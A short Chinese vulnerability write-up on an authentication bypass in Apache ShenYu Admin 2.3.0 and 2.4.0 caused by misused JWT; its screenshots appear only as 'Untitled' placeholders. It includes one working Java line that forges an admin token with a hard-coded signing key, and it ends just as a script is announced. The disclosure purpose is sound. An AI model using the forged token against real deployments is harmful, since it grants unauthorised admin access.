Apache ShenYu 是应用于所有微服务场景的,可扩展、高性能、响应式的 API 网关解决方案。

Apache ShenYu Admin 存在身份验证绕过漏洞。 ShenyuAdminBootstrap 中 JWT 的错误使用允许攻击者绕过身份验证,攻击者可通过该漏洞直接进入系统后台。

0x02 漏洞版本

Apache ShenYu 2.3.0

Apache ShenYu 2.4.0

0x03 漏洞复现

启动环境

Untitled

访问链接:

Untitled

脚本验证:

Untitled

登录。

Untitled

关键点是生成 admin 账号的 jwt token。

System.out.println(JWT.create().withClaim("userName", "admin").withExpiresAt(new Date()).sign(Algorithm.HMAC256("2095132720951327")));

脚本: